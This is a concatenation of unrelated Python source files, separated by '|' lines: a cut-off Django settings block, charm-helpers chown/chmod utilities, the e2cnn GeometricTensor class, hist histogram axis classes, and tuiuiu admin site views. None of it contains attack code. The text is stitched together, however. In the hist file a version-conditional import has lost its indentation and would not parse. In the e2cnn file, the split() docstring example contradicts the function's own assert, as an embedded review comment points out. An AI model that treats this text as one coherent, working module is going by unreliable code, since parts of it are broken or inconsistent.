DEMOCRACY_WORKS_API_KEY = env('DEMOCRACY_WORKS_API_KEY')
DEMOCRACY_WORKS_API_URL = env('DEMOCRACY_WORKS_API_URL')
####
# Timezone & Localization Settings
LANGUAGE_CODE = env('LANGUAGE_CODE')
TIME_ZONE = env('TIME_ZONE')
DATETIME_FORMAT = '%Y-%m-%d %H:%M'
USE_I18N = True
USE_L10N = True
USE_TZ = True
###
# Crispy Forms
CRISPY_TEMPLATE_PACK = 'bootstrap4'
####
# Test Runner Settings
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
NOSE_ARGS = [
    '--with-xunit',
    '--nologcapture'
]
####
# Django Debug Toolbar Settings
INTERNAL_IPS = env('DEBUG_TOOLBAR_IPS')
|
#
# Copyright 2012 Canonical Ltd.
#
# This file is sourced from lp:openstack-charm-helpers
#
# Authors:
# James Page <james.page@ubuntu.com>
# Paul Collins <paul.collins@canonical.com>
# Adam Gandelman <adamg@ubuntu.com>
#
import grp
import os
import pwd
from charmhelpers.core.hookenv import (
local_unit,
remote_unit,
log
)
def is_newer():
    """Return True if the local unit is "newer" than the remote unit.

    Juju unit names have the form ``service/N``; the comparison is on the
    numeric suffix N. The suffix is cast to ``int`` because a string
    comparison ranks unit 10 below unit 9 ('1' < '9').
    """
    l_unit_no = int(local_unit().split('/')[1])
    r_unit_no = int(remote_unit().split('/')[1])
    return (l_unit_no > r_unit_no)
def chown(path, owner='root', group='root', recursive=False):
    """Change ownership of ``path`` to ``owner``:``group``.

    :param path: filesystem path; a warning is logged if it does not exist
    :param owner: user name resolved via ``pwd.getpwnam``
    :param group: group name resolved via ``grp.getgrnam``
    :param recursive: if True, also chown everything below ``path``
    """
    if os.path.exists(path):
        log('Changing ownership of path %s to %s:%s' %
            (path, owner, group))
        uid = pwd.getpwnam(owner).pw_uid
        gid = grp.getgrnam(group).gr_gid
        if recursive:
            # os.walk() lists entries *under* each directory but never yields
            # the starting path itself (and yields nothing for a plain file),
            # so chown the top-level path explicitly first.
            os.chown(path, uid, gid)
            for root, dirs, files in os.walk(path):
                for d in dirs:
                    os.chown(os.path.join(root, d), uid, gid)
                for f in files:
                    os.chown(os.path.join(root, f), uid, gid)
        else:
            os.chown(path, uid, gid)
    else:
        log('%s path does not exist' % path)
def chmod(path, perms, recursive=False):
    """Change permission bits of ``path`` to ``perms``.

    :param path: filesystem path; an error is logged if it does not exist
    :param perms: numeric mode (e.g. ``0o755``) passed to ``os.chmod``
    :param recursive: if True, also apply ``perms`` to everything below
        ``path``
    """
    if os.path.exists(path):
        log('Changing perms of path %s ' % path)
        if recursive:
            # os.walk() never yields the starting path itself (and yields
            # nothing for a plain file), so chmod the top-level path too.
            os.chmod(path, perms)
            for root, dirs, files in os.walk(path):
                for d in dirs:
                    os.chmod(os.path.join(root, d), perms)
                for f in files:
                    os.chmod(os.path.join(root, f), perms)
        else:
            os.chmod(path, perms)
    else:
        # hookenv.log's signature is (message, level=None); the original call
        # log('ERROR', msg) passed the level string as the message.
        log('%s path does not exist' % path, level='ERROR')
|
import torch
from torch import Tensor
from .field_type import FieldType
from typing import List, Union
import itertools
from collections.abc import Iterable
# Public API of this module.
__all__ = ["GeometricTensor", "tensor_directsum"]
class GeometricTensor:
    def __init__(self, tensor: Tensor, type: FieldType):
        r"""
        A GeometricTensor can be interpreted as a *typed* tensor.
        It is wrapping a common :class:`torch.Tensor` and endows it with a (compatible) :class:`~e2cnn.nn.FieldType` as
        *transformation law*.
        The :class:`~e2cnn.nn.FieldType` describes the action of a group :math:`G` on the tensor.
        This action includes both a transformation of the base space and a transformation of the channels according to
        a :math:`G`-representation :math:`\rho`.
        All *e2cnn* neural network operations have :class:`~e2cnn.nn.GeometricTensor` s as inputs and outputs.
        They perform a dynamic typechecking, ensuring that the transformation laws of the data and the operation match.
        See also :class:`~e2cnn.nn.EquivariantModule`.
        As usual, the first dimension of the tensor is interpreted as the batch dimension. The second is the fiber
        (or channel) dimension, which is associated with a group representation by the field type. The following
        dimensions are the spatial dimensions (like in a conventional CNN).
        The operations of **addition** and **scalar multiplication** are supported.
        For example::
            gs = e2cnn.gspaces.Rot2dOnR2(8)
            type = e2cnn.nn.FieldType(gs, [gs.regular_repr]*3)
            t1 = e2cnn.nn.GeometricTensor(torch.randn(1, 24, 3, 3), type)
            t2 = e2cnn.nn.GeometricTensor(torch.randn(1, 24, 3, 3), type)
            # addition
            t3 = t1 + t2
            # scalar product
            t3 = t1 * 3.
            # scalar product also supports tensors containing only one scalar
            t3 = t1 * torch.tensor(3.)
            # inplace operations are also supported
            t1 += t2
            t2 *= 3.
        .. warning ::
            The multiplication of a PyTorch tensor containing only a scalar with a GeometricTensor is only supported
            when using PyTorch 1.4 or higher (see this `issue <https://github.com/pytorch/pytorch/issues/26333>`_ )
        A GeometricTensor supports **slicing** in a similar way to PyTorch's :class:`torch.Tensor`.
        More precisely, slicing along the batch (1st) and the spatial (3rd, 4th, ...) dimensions works as usual.
        However, slicing the fiber (2nd) dimension would break equivariance when splitting channels belonging to
        the same field.
        To prevent this, slicing on the second dimension is defined over *fields* instead of channels.
        .. warning ::
            GeometricTensor only supports basic *slicing* but it does **not** support *advanced indexing* (see NumPy's
            documentation about
            `indexing <https://docs.scipy.org/doc/numpy/reference/arrays.indexing.html#basic-slicing-and-indexing>`_
            for more details).
            Moreover, in contrast to NumPy and PyTorch, an index containing a single integer value **does not** reduce
            the dimensionality of the tensor.
            In this way, the resulting tensor can always be interpreted as a GeometricTensor.
        We give few examples to illustrate this behavior::
            # Example of GeometricTensor slicing
            space = e2cnn.gspaces.Rot2dOnR2(4)
            type = e2cnn.nn.FieldType(space, [
                # field type        # index # size
                space.regular_repr, #   0   #  4
                space.regular_repr, #   1   #  4
                space.irrep(1),     #   2   #  2
                space.irrep(1),     #   3   #  2
                space.trivial_repr, #   4   #  1
                space.trivial_repr, #   5   #  1
                space.trivial_repr, #   6   #  1
            ])                      # sum = 15
            # this FieldType contains 7 fields
            len(type)
            >> 7
            # the size of this FieldType is equal to the sum of the sizes of each of its fields
            type.size
            >> 15
            geom_tensor = e2cnn.nn.GeometricTensor(torch.randn(10, type.size, 9, 9), type)
            geom_tensor.shape
            >> torch.Size([10, 15, 9, 9])
            geom_tensor[1:3, :, 2:5, 2:5].shape
            >> torch.Size([2, 15, 3, 3])
            geom_tensor[..., 2:5].shape
            >> torch.Size([10, 15, 9, 3])
            # the tensor contains the fields 1:4, i.e 1, 2 and 3
            # these fields have size, respectively, 4, 2 and 2
            # so the resulting tensor has 8 channels
            geom_tensor[:, 1:4, ...].shape
            >> torch.Size([10, 8, 9, 9])
            # the tensor contains the fields 0:6:2, i.e 0, 2 and 4
            # these fields have size, respectively, 4, 2 and 1
            # so the resulting tensor has 7 channels
            geom_tensor[:, 0:6:2].shape
            >> torch.Size([10, 7, 9, 9])
            # the tensor contains only the field 2, which has size 2
            # note, also, that even though a single index is used for the batch dimension, the resulting tensor
            # still has 4 dimensions
            geom_tensor[3, 2].shape
            >> torch.Size([1, 2, 9, 9])
        .. warning ::
            *Slicing* over the fiber (2nd) dimension with ``step > 1`` or with a negative step is converted
            into *indexing* over the channels.
            This means that, in these cases, slicing behaves like *advanced indexing* in PyTorch and NumPy
            **returning a copy instead of a view**.
            For more details, see the *note* `here <https://pytorch.org/docs/stable/tensor_view.html>`_ and
            *NumPy*'s `docs <https://docs.scipy.org/doc/numpy/reference/arrays.indexing.html>`_ .
        .. note ::
            Slicing is not supported for setting values inside the tensor
            (i.e. :meth:`~object.__setitem__` is not implemented).
            Indeed, depending on the values which are assigned, this operation can break the symmetry of the tensor
            which may not transform anymore according to its transformation law (specified by ``type``).
            In case this feature is necessary, one can directly access the underlying :class:`torch.Tensor`, e.g.
            ``geom_tensor.tensor[:3, :, 2:5, 2:5] = torch.randn(3, 4, 3, 3)``, although this is not recommended.
        Args:
            tensor (torch.Tensor): the tensor data
            type (FieldType): the type of the tensor, modeling its transformation law
        Attributes:
            ~.tensor (torch.Tensor)
            ~.type (FieldType)
        """
        assert isinstance(tensor, torch.Tensor)
        assert isinstance(type, FieldType)
        # at least a batch and a fiber/channel dimension are required
        assert len(tensor.shape) >= 2
        assert tensor.shape[1] == type.size, \
            f"Error! The size of the tensor {tensor.shape} does not match the size of the field type {type.size}."
        # torch.Tensor: PyTorch tensor containing the data
        self.tensor = tensor
        # FieldType: field type of the signal
        self.type = type
    def restrict(self, id) -> 'GeometricTensor':
        r"""
        Restrict the field type of this tensor.
        The method returns a new :class:`~e2cnn.nn.GeometricTensor` whose :attr:`~e2cnn.nn.GeometricTensor.type`
        is equal to this tensor's :attr:`~e2cnn.nn.GeometricTensor.type`
        restricted to a subgroup :math:`H<G` (see :meth:`e2cnn.nn.FieldType.restrict`).
        The restricted :attr:`~e2cnn.nn.GeometricTensor.type` is associated with the restricted representation
        :math:`\Res{H}{G}\rho` of the :math:`G`-representation :math:`\rho` associated to this tensor's
        :attr:`~e2cnn.nn.GeometricTensor.type`.
        The input ``id`` specifies the subgroup :math:`H < G`.
        Notice that the underlying :attr:`~e2cnn.nn.GeometricTensor.tensor` instance will be shared between
        the current tensor and the returned one.
        .. warning ::
            The method builds the new representation on the fly; hence, if this operation is needed at run time,
            we suggest to use :class:`e2cnn.nn.RestrictionModule` which pre-computes the new representation offline.
        .. seealso ::
            Check the documentation of the :meth:`~e2cnn.gspaces.GSpace.restrict` method in the
            :class:`~e2cnn.gspaces.GSpace` instance used for a description of the parameter ``id``.
        Args:
            id: the id identifying the subgroup :math:`H` the representations are restricted to
        Returns:
            the geometric tensor with the restricted representations
        """
        new_class = self.type.restrict(id)
        # the underlying data is shared, only the type changes
        return GeometricTensor(self.tensor, new_class)
    def split(self, breaks: List[int]) -> List['GeometricTensor']:
        r"""
        Split this tensor on the channel dimension in a list of smaller tensors.
        The original tensor is split at the *fields* specified by the index list ``breaks``.
        If the tensor is associated with the list of fields :math:`\{\rho_i\}_i`
        (see :attr:`e2cnn.nn.FieldType.representations`), the :math:`j`-th output tensor will contain the fields
        :math:`\rho_{\text{breaks}[j-1]}, \dots, \rho_{\text{breaks}[j]-1}` of the original tensor.
        If `breaks = None`, the tensor is split at each field.
        This is equivalent to using `breaks = list(range(len(self.type)))`.
        Example ::
            space = e2cnn.gspaces.Rot2dOnR2(4)
            type = e2cnn.nn.FieldType(space, [
                space.regular_repr,  # size = 4
                space.regular_repr,  # size = 4
                space.irrep(1),      # size = 2
                space.irrep(1),      # size = 2
                space.trivial_repr,  # size = 1
                space.trivial_repr,  # size = 1
                space.trivial_repr,  # size = 1
            ])                       #  sum = 15
            type.size
            >> 15
            geom_tensor = e2cnn.nn.GeometricTensor(torch.randn(10, type.size, 7, 7), type)
            geom_tensor.shape
            >> torch.Size([10, 15, 7, 7])
            # split the tensor in 3 parts
            len(geom_tensor.split([0, 4, 6]))
            >> 3
            # the first contains
            # - the first 2 regular fields (2*4 = 8 channels)
            # - 2 vector fields (irrep(1)) (2*2 = 4 channels)
            # and, therefore, contains 12 channels
            geom_tensor.split([0, 4, 6])[0].shape
            >> torch.Size([10, 12, 7, 7])
            # the second contains only 2 scalar (trivial) fields (2*1 = 2 channels)
            geom_tensor.split([0, 4, 6])[1].shape
            >> torch.Size([10, 2, 7, 7])
            # the last contains only 1 scalar (trivial) field (1*1 = 1 channels)
            geom_tensor.split([0, 4, 6])[2].shape
            >> torch.Size([10, 1, 7, 7])
        Args:
            breaks (list): indices of the fields where to split the tensor
        Returns:
            list of :class:`~e2cnn.nn.GeometricTensor` s into which the original tensor is chunked
        """
        if breaks is None:
            breaks = list(range(len(self.type)))
        breaks.append(len(self.type))
        # final list of tensors
        tensors = []
        # list containing the index of the channels separating consecutive fields in this tensor
        positions = []
        last = 0
        for repr in self.type.representations:
            positions.append(last)
            last += repr.size
        positions.append(last)
        last_field = 0
        # for each break point
        for b in breaks:
            # NOTE(review): a leading 0 in ``breaks`` (or ``breaks=None``, which
            # yields range(len(self.type)) and therefore starts at 0) trips this
            # assert, yet the docstring example passes [0, 4, 6] — confirm the
            # intended contract for the first break point.
            assert b > last_field, 'Error! "breaks" must be an increasing list of positive indexes'
            # compute the sub-class of the new sub-tensor
            repr = FieldType(self.type.gspace, self.type.representations[last_field: b])
            # retrieve the sub-tensor
            data = self.tensor[:, positions[last_field]:positions[b], ...]
            tensors.append(GeometricTensor(data, repr))
            last_field = b
        return tensors
    def transform(self, element) -> 'GeometricTensor':
        r"""
        Transform the current tensor according to the group representation associated to the input element
        and its induced action on the base space
        .. warning ::
            The input tensor is detached before the transformation therefore no gradient is backpropagated
            through this operation
        See :meth:`e2cnn.nn.GeometricTensor.transform_fibers` to transform only the fibers, i.e. not transform
        the base space.
        Args:
            element: an element of the group of symmetries of the fiber.
        Returns:
            the transformed tensor
        """
        transformed = self.type.transform(self.tensor, element)
        return GeometricTensor(transformed, self.type)
    def transform_fibers(self, element) -> 'GeometricTensor':
        r"""
        Transform the feature vectors of the underlying tensor according to the group representation associated to
        the input element.
        Interpreting the tensor as a vector-valued signal :math:`f: X \to \mathbb{R}^c` over a base space :math:`X`
        (where :math:`c` is the number of channels of the tensor), given the input ``element`` :math:`g \in G`
        (:math:`G` fiber group) the method returns the new signal :math:`f'`:
        .. math ::
            f'(x) := \rho(g) f(x)
        for :math:`x \in X` point in the base space and :math:`\rho` the representation of :math:`G` in the
        field type of this tensor.
        Notice that the input element has to be an element of the fiber group of this tensor's field type.
        .. seealso ::
            See :meth:`e2cnn.nn.GeometricTensor.transform` to transform the whole tensor.
        Args:
            element: an element of the group of symmetries of the fiber.
        Returns:
            the transformed tensor
        """
        # apply the representation matrix rho(g) to the channel axis only
        rho = torch.FloatTensor(self.type.representation(element))
        data = torch.einsum("oi,bihw->bohw", (rho, self.tensor.contiguous())).contiguous()
        return GeometricTensor(data, self.type)
    @property
    def shape(self):
        r"""
        Alias for ``self.tensor.shape``
        """
        return self.tensor.shape
    def size(self):
        r"""
        Alias for ``self.tensor.size()``
        .. seealso ::
            :meth:`torch.Tensor.size`
        """
        return self.tensor.size()
    def to(self, *args, **kwargs):
        r"""
        Alias for ``self.tensor.to(*args, **kwargs)``.
        Applies :meth:`torch.Tensor.to` to the underlying tensor and wraps the resulting tensor in a new
        :class:`~e2cnn.nn.GeometricTensor` with the same type.
        """
        tensor = self.tensor.to(*args, **kwargs)
        return GeometricTensor(tensor, self.type)
    def __getitem__(self, slices) -> 'GeometricTensor':
        r'''
        A GeometricTensor supports *slicing* in a similar way to PyTorch's :class:`torch.Tensor`.
        More precisely, slicing along the batch (1st) and the spatial (3rd, 4th, ...) dimensions works as usual.
        However, slicing along the channel dimension could break equivariance by splitting the channels belonging to the
        same field.
        For this reason, slicing on the second dimension is not defined over the channels but over fields.
        When a continuous (step=1) slice is used over the fields/channels dimension (the 2nd axis), it is converted
        into a continuous slice over the channels.
        This is not possible when the step is greater than 1 or negative.
        In such cases, the slice over the fields needs to be converted into an index over the channels.
        Moreover, when a single integer is used to index an axis, that axis is not discarded as in PyTorch but is
        preserved with size 1.
        Slicing is not supported for setting values inside the tensor (i.e. :meth:`object.__setitem__`
        is not implemented).
        '''
        # Slicing is not supported on the channel dimension.
        if isinstance(slices, tuple):
            if len(slices) > len(self.tensor.shape):
                raise TypeError(
                    f'''
                        Error! Too many slicing indices for GeometricTensor.
                        At most {len(self.tensor.shape)} indices expected but {len(slices)} indices passed.
                    '''
                )
        else:
            # a single (non-tuple) index is normalized to a 1-tuple
            slices = (slices,)
        for i, idx in enumerate(slices):
            if not (isinstance(idx, slice) or isinstance(idx, int) or idx == Ellipsis):
                raise TypeError(f'''
                    Error! Advanced Indexing over a GeometricTensor is not supported yet.
                    Currently, only basic slicing is supported.
                ''')
        naxes = len(self.tensor.shape)
        # count the number of indexes passed
        indexed_axes = 0
        for idx in slices:
            indexed_axes += 1 - (idx == Ellipsis)
        # number of axes which are missing an index
        missing_axes = naxes - indexed_axes
        # expand the first ellipsis with a number of full slices (i.e. [::]) equal to the number
        # of axes not indexed. Discard all other ellipses
        expanded_idxs = []
        expanded_ellipsis = False
        for s in slices:
            if s == Ellipsis:
                # expand only the first ellipsis
                if not expanded_ellipsis:
                    expanded_idxs += [slice(None)]*missing_axes
                    expanded_ellipsis = True
            else:
                # other indices are preserved
                expanded_idxs.append(s)
        # maximum index per dimension
        idx_max = list(self.tensor.shape)
        idx_max[1] = len(self.type)
        # If an index containing a single integer is passed, it is converted into a slice
        # which starts at that index and ends at the following one.
        # In this way, when passing a single integer to index a dimension, the resulting tensor will still have that
        # dimension with size 1
        for i in range(len(expanded_idxs)):
            if isinstance(expanded_idxs[i], int):
                idx = expanded_idxs[i]
                if idx < 0:
                    # convert a negative index into a positive index
                    idx = idx_max[i] + idx
                expanded_idxs[i] = slice(idx, idx+1, 1)
        if len(expanded_idxs) == 1:
            # if only the first dimension is indexed, there is no need to do anything
            # the resulting tensor will have the same type of the original as the indexing does not affect the
            # channels/fields dimension
            type = self.type
        elif isinstance(expanded_idxs[1], slice) and (expanded_idxs[1].step is None or expanded_idxs[1].step == 1):
            # If the index over the fields is a slice and it is contiguous, we can convert it into a
            # contiguous slice over the channels.
            # The slice will start from the first channel of the first field and will stop at the last channel
            # of the last field
            start = expanded_idxs[1].start if expanded_idxs[1].start is not None else 0
            stop = expanded_idxs[1].stop if expanded_idxs[1].stop is not None else len(self.type)
            channel_idxs = slice(
                self.type.fields_start[start],
                self.type.fields_end[stop-1],
                1
            )
            if start == 0 and stop == len(self.type):
                # if all the fields are retrieved by this index, the resulting tensor has the same field
                # types of the original one
                type = self.type
            else:
                # otherwise, only a subset of the fields are preserved
                type = FieldType(self.type.gspace, self.type.representations[expanded_idxs[1]])
            expanded_idxs[1] = channel_idxs
        else:
            # If the index over the fields is not a slice or it is not a contiguous slice, we need to convert it
            # into an index over the channels. We first use the index provided to retrieve the list of fields
            # and then add the index of their channels in a list of indexes
            idxs = []
            # convert the indices into iterable and retrieve the subset of field representations
            if isinstance(expanded_idxs[1], slice):
                fields = range(len(self.type))[expanded_idxs[1]]
                representations = self.type.representations[expanded_idxs[1]]
            elif isinstance(expanded_idxs[1], int):
                fields = [expanded_idxs[1]]
                representations = self.type.representations[expanded_idxs[1]]
            elif isinstance(expanded_idxs[1], Iterable):
                fields = expanded_idxs[1]
                representations = [self.type.representations[f] for f in fields]
            else:
                raise ValueError('Index over the fiber (2nd) dimension not recognized.')
            # iterate over all fields indexed by the user
            for field in fields:
                # append the indexes of the channels in the field
                idxs.append(list(
                    range(
                        self.type.fields_start[field],
                        self.type.fields_end[field],
                        1
                    )
                ))
            # only a subset of the fields are preserved by this index
            type = FieldType(self.type.gspace, representations)
            # concatenate all the channel indexes
            channel_idxs = list(itertools.chain(*idxs))
            expanded_idxs[1] = channel_idxs
        idxs = tuple(expanded_idxs)
        sliced_tensor = self.tensor[idxs]
        return GeometricTensor(sliced_tensor, type)
    def __add__(self, other: 'GeometricTensor') -> 'GeometricTensor':
        r"""
        Add two compatible :class:`~e2cnn.nn.GeometricTensor` using pointwise addition.
        The two tensors needs to have the same shape and be associated to the same field type.
        Args:
            other (GeometricTensor): the other geometric tensor
        Returns:
            the sum
        """
        assert self.type == other.type, 'The two geometric tensor must have the same FieldType'
        return GeometricTensor(self.tensor + other.tensor, self.type)
    def __sub__(self, other: 'GeometricTensor') -> 'GeometricTensor':
        r"""
        Subtract two compatible :class:`~e2cnn.nn.GeometricTensor` using pointwise subtraction.
        The two tensors needs to have the same shape and be associated to the same field type.
        Args:
            other (GeometricTensor): the other geometric tensor
        Returns:
            their difference
        """
        assert self.type == other.type, 'The two geometric tensor must have the same FieldType'
        return GeometricTensor(self.tensor - other.tensor, self.type)
    def __iadd__(self, other: 'GeometricTensor') -> 'GeometricTensor':
        r"""
        Add a compatible :class:`~e2cnn.nn.GeometricTensor` to this tensor inplace.
        The two tensors needs to have the same shape and be associated to the same field type.
        Args:
            other (GeometricTensor): the other geometric tensor
        Returns:
            this tensor
        """
        assert self.type == other.type, 'The two geometric tensor must have the same FieldType'
        self.tensor += other.tensor
        return self
    def __isub__(self, other: 'GeometricTensor') -> 'GeometricTensor':
        r"""
        Subtract a compatible :class:`~e2cnn.nn.GeometricTensor` to this tensor inplace.
        The two tensors needs to have the same shape and be associated to the same field type.
        Args:
            other (GeometricTensor): the other geometric tensor
        Returns:
            this tensor
        """
        assert self.type == other.type, 'The two geometric tensor must have the same FieldType'
        self.tensor -= other.tensor
        return self
    def __mul__(self, other: Union[float, torch.Tensor]) -> 'GeometricTensor':
        r"""
        Scalar product of this :class:`~e2cnn.nn.GeometricTensor` with a scalar.
        The scalar can be a float number of a :class:`torch.Tensor` containing only
        one scalar (i.e. :func:`torch.numel` should return `1`).
        Args:
            other : a scalar
        Returns:
            the scalar product
        """
        assert isinstance(other, float) or other.numel() == 1, 'Only multiplication with a scalar is allowed'
        return GeometricTensor(self.tensor * other, self.type)
    # scalar * tensor behaves like tensor * scalar
    __rmul__ = __mul__
    def __imul__(self, other: Union[float, torch.Tensor]) -> 'GeometricTensor':
        r"""
        Scalar product of this :class:`~e2cnn.nn.GeometricTensor` with a scalar.
        The operation is done inplace.
        The scalar can be a float number of a :class:`torch.Tensor` containing only
        one scalar (i.e. :func:`torch.numel` should return `1`).
        Args:
            other : a scalar
        Returns:
            the scalar product
        """
        assert isinstance(other, float) or other.numel() == 1, 'Only multiplication with a scalar is allowed'
        self.tensor *= other
        return self
    def __repr__(self):
        # prefix the tensor's own repr with "g_" and append the field type
        t = repr(self.tensor)[:-1]
        t = t.replace('\n', '\n  ')
        r = 'g_' + t + ', ' + repr(self.type) + ')'
        return r
def tensor_directsum(tensors: List['GeometricTensor']) -> 'GeometricTensor':
    r"""
    Concatenate a list of :class:`~e2cnn.nn.GeometricTensor` s along the channel axis (``dim=1``).
    All inputs must live on the same :class:`~e2cnn.gspaces.GSpace` and share the
    batch size and the spatial shape; only the channel dimension may differ.
    The channels of the result are typed by the direct sum of the input field types.
    .. seealso::
        :func:`e2cnn.group.directsum`
    Args:
        tensors (list): a list of :class:`~e2cnn.nn.GeometricTensor` s
    Returns:
        the direct sum of the inputs
    """
    reference = tensors[0]
    # every further input must be compatible with the first one
    for other in tensors[1:]:
        assert reference.type.gspace == other.type.gspace
        assert reference.tensor.ndimension() == other.tensor.ndimension()
        assert reference.tensor.shape[0] == other.tensor.shape[0]
        assert reference.tensor.shape[2:] == other.tensor.shape[2:]
    # the new field type is the concatenation of every input's representations
    summed_type = FieldType(
        reference.type.gspace,
        [rho for t in tensors for rho in t.type.representations]
    )
    # stack the raw data on the channel axis and re-wrap it
    stacked = torch.cat([t.tensor for t in tensors], dim=1)
    return GeometricTensor(stacked, summed_type)
|
import sys
from typing import Any, Dict, Iterable, List, Optional, Tuple
import boost_histogram.axis as bha
import hist
from hist.axestuple import ArrayTuple, NamedAxesTuple
if sys.version_info >= (3, 8):
from typing import Protocol
else:
from typing_extensions import Protocol
from . import transform
# Public API of this module; also the value returned by __dir__ below.
__all__ = (
    "AxisProtocol",
    "AxesMixin",
    "Regular",
    "Variable",
    "Integer",
    "IntCategory",
    "StrCategory",
    "Boolean",
    "transform",
    "NamedAxesTuple",
    "ArrayTuple",
)
def __dir__() -> Tuple[str, ...]:
    """Restrict ``dir()`` on this module to the public names in ``__all__``."""
    return __all__
class CoreAxisProtocol(Protocol):
    """Structural type of the low-level axis object: anything exposing a metadata dict."""
    metadata: Dict[str, Any]
class AxisProtocol(Protocol):
    """Structural type of a hist axis: metadata, a read-only ``name``,
    a writable ``label`` and the underlying core axis ``_ax``."""
    metadata: Any
    @property
    def name(self) -> str:
        ...
    label: str
    _ax: CoreAxisProtocol
class AxesMixin:
    """Mixin adding hist's ``name``/``label`` support to a boost-histogram axis.
    Both values live in the core axis' metadata dict (``_ax.metadata``)."""
    __slots__ = ()
    # Support mixing before or after a bh class
    def __init_subclass__(cls, **kwargs: Any) -> None:
        super().__init_subclass__(**kwargs)  # type: ignore
    @property
    def name(self: AxisProtocol) -> str:
        """
        Get the name of the axis (read-only here; the axis constructors set it
        once via ``_ax.metadata["name"]``)
        """
        return self._ax.metadata.get("name", "")
    @property
    def label(self: AxisProtocol) -> str:
        """
        Get or set the label of the axis; falls back to ``name`` when unset
        """
        return self._ax.metadata.get("label", "") or self.name
    @label.setter
    def label(self: AxisProtocol, value: str) -> None:
        self._ax.metadata["label"] = value
    def _repr_args_(self: AxisProtocol) -> List[str]:
        """
        Return options for use in repr.
        """
        # extend the parent repr options with name/label when they are set
        ret: List[str] = super()._repr_args_()  # type: ignore
        if self.name:
            ret.append(f"name={self.name!r}")
        if self.label:
            ret.append(f"label={self.label!r}")
        return ret
class Regular(AxesMixin, bha.Regular, family=hist):
    """Uniformly binned axis with hist's ``name``/``label`` metadata."""

    __slots__ = ()

    def __init__(
        self,
        bins: int,
        start: float,
        stop: float,
        *,
        name: str = "",
        label: str = "",
        metadata: Any = None,
        flow: bool = True,
        underflow: Optional[bool] = None,
        overflow: Optional[bool] = None,
        growth: bool = False,
        circular: bool = False,
        transform: Optional[bha.transform.AxisTransform] = None,
        __dict__: Optional[Dict[str, Any]] = None,
    ) -> None:
        # ``flow`` supplies the default for both edges; an explicit
        # ``underflow``/``overflow`` argument overrides it individually.
        with_underflow = flow if underflow is None else underflow
        with_overflow = flow if overflow is None else overflow
        super().__init__(
            bins,
            start,
            stop,
            metadata=metadata,
            underflow=with_underflow,
            overflow=with_overflow,
            growth=growth,
            circular=circular,
            transform=transform,
            __dict__=__dict__,
        )
        # hist-specific metadata lives on the core axis / label property
        self._ax.metadata["name"] = name
        self.label = label
class Boolean(AxesMixin, bha.Boolean, family=hist):
    """Two-bin boolean axis with hist's ``name``/``label`` metadata."""

    __slots__ = ()

    def __init__(
        self,
        *,
        name: str = "",
        label: str = "",
        metadata: Any = None,
        __dict__: Optional[Dict[str, Any]] = None,
    ) -> None:
        super().__init__(metadata=metadata, __dict__=__dict__)
        # hist-specific metadata lives on the core axis / label property
        self._ax.metadata["name"] = name
        self.label = label
class Variable(bha.Variable, AxesMixin, family=hist):
    """Axis with explicitly listed bin edges and hist's ``name``/``label`` metadata."""

    __slots__ = ()

    def __init__(
        self,
        edges: Iterable[float],
        *,
        name: str = "",
        label: str = "",
        flow: bool = True,
        underflow: Optional[bool] = None,
        overflow: Optional[bool] = None,
        growth: bool = False,
        circular: bool = False,
        metadata: Any = None,
        __dict__: Optional[Dict[str, Any]] = None,
    ) -> None:
        # ``flow`` supplies the default for both edges; an explicit
        # ``underflow``/``overflow`` argument overrides it individually.
        with_underflow = flow if underflow is None else underflow
        with_overflow = flow if overflow is None else overflow
        super().__init__(
            edges,
            metadata=metadata,
            underflow=with_underflow,
            overflow=with_overflow,
            growth=growth,
            circular=circular,
            __dict__=__dict__,
        )
        # hist-specific metadata lives on the core axis / label property
        self._ax.metadata["name"] = name
        self.label = label
class Integer(bha.Integer, AxesMixin, family=hist):
    """Axis of consecutive integers with hist's ``name``/``label`` metadata."""

    __slots__ = ()

    def __init__(
        self,
        start: int,
        stop: int,
        *,
        name: str = "",
        label: str = "",
        flow: bool = True,
        underflow: Optional[bool] = None,
        overflow: Optional[bool] = None,
        growth: bool = False,
        circular: bool = False,
        metadata: Any = None,
        __dict__: Optional[Dict[str, Any]] = None,
    ) -> None:
        # ``flow`` supplies the default for both edges; an explicit
        # ``underflow``/``overflow`` argument overrides it individually.
        with_underflow = flow if underflow is None else underflow
        with_overflow = flow if overflow is None else overflow
        super().__init__(
            start,
            stop,
            metadata=metadata,
            underflow=with_underflow,
            overflow=with_overflow,
            growth=growth,
            circular=circular,
            __dict__=__dict__,
        )
        # hist-specific metadata lives on the core axis / label property
        self._ax.metadata["name"] = name
        self.label = label
class IntCategory(bha.IntCategory, AxesMixin, family=hist):
    """An axis whose bins are an explicit list of integer categories."""

    __slots__ = ()

    def __init__(
        self,
        categories: Iterable[int],
        *,
        name: str = "",
        label: str = "",
        growth: bool = False,
        metadata: Any = None,
        __dict__: Optional[Dict[str, Any]] = None,
    ) -> None:
        """Create the axis; ``growth`` lets new categories be added on fill."""
        super().__init__(
            categories, metadata=metadata, growth=growth, __dict__=__dict__
        )
        self._ax.metadata["name"] = name
        self.label = label
class StrCategory(bha.StrCategory, AxesMixin, family=hist):
    """An axis whose bins are an explicit list of string categories."""

    __slots__ = ()

    def __init__(
        self,
        categories: Iterable[str],
        *,
        name: str = "",
        label: str = "",
        growth: bool = False,
        metadata: Any = None,
        __dict__: Optional[Dict[str, Any]] = None,
    ) -> None:
        """Create the axis; ``growth`` lets new categories be added on fill."""
        super().__init__(
            categories, metadata=metadata, growth=growth, __dict__=__dict__
        )
        self._ax.metadata["name"] = name
        self.label = label
|
from __future__ import absolute_import, unicode_literals
from django.utils.translation import ugettext_lazy
from tuiuiu.tuiuiuadmin.views import generic
from tuiuiu.tuiuiuadmin.viewsets.model import ModelViewSet
from tuiuiu.tuiuiucore.models import Site
from tuiuiu.tuiuiucore.permissions import site_permission_policy
from tuiuiu.tuiuiusites.forms import SiteForm
class IndexView(generic.IndexView):
    # Admin listing page for all configured sites.
    template_name = 'tuiuiusites/index.html'
    page_title = ugettext_lazy("Sites")
    add_item_label = ugettext_lazy("Add a site")
    context_object_name = 'sites'
class CreateView(generic.CreateView):
    # Admin "add site" form; {0} in the message is the new site's name.
    page_title = ugettext_lazy("Add site")
    success_message = ugettext_lazy("Site '{0}' created.")
    template_name = 'tuiuiusites/create.html'
class EditView(generic.EditView):
    # Admin "edit site" form; {0} in the messages is the site's name.
    success_message = ugettext_lazy("Site '{0}' updated.")
    error_message = ugettext_lazy("The site could not be saved due to errors.")
    delete_item_label = ugettext_lazy("Delete site")
    context_object_name = 'site'
    template_name = 'tuiuiusites/edit.html'
